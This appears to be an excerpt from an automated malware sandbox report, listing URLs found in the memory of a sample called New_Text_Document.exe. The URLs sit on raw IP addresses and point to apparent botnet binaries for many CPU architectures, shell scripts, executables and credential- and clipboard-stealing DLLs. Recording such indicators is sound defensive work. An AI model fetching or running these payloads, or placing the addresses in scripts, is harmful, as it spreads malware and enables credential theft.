                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.202.168.239:2537/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.arc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.i486
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.i686
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.spc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/f2q2kke5aadloo4aasdjjjfirbmw/0xh0roxxnavebusyoo.x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.206.227.148/shithirointhehouse.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.227.66.231:10024/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.235.187.132:44557/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.239.241.72:23754/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.5r3fqt67ew531has4231.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.5r3fqt67ew531has4231.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.5r3fqt67ew531has4231.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.5r3fqt67ew531has4231.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.5r3fqt67ew531has4231.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.5r3fqt67ew531has4231.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.5r3fqt67ew531has4231.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.5r3fqt67ew531has4231.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.5r3fqt67ew531has4231.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.5r3fqt67ew531has4231.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.nekoisdaddy.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.nekoisdaddy.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.nekoisdaddy.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.nekoisdaddy.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.nekoisdaddy.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.nekoisdaddy.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.nekoisdaddy.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.nekoisdaddy.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/bestone/.nekoisdaddy.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/nekoisdaddy.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.253.247.56/telnet.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.255.105.147/key.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.28/b9djs2g/Plugins/clip64.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.28/b9djs2g/Plugins/cred64.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.39/a03c8956ff198333/freebl3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.39/a03c8956ff198333/mozglue.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.39/a03c8956ff198333/msvcp140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.39/a03c8956ff198333/nss3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.39/a03c8956ff198333/softokn3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.39/a03c8956ff198333/sqlite3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.39/a03c8956ff198333/vcruntime140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.80/newrock.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.67.3/2.gif
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.67.3/bashirc.x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.67.3/x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.58.10.237:5442/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.66.26.236:7256/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.88.229.223:45077/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.89.207.160:4646/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.89.36.162:58396/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.94.126.167:59434/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.209.208.17:17989/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.246.136.58:10597/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.248.10.126:27965/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.248.22.59:49258/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.251.250.50:42642/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.252.0.14:59277/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.38.24.188:22954/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.79.149.150:53922/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.79.86.229:10975/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.83.147.123:20858/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.83.59.207:22489/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.86.98.166:16903/.i
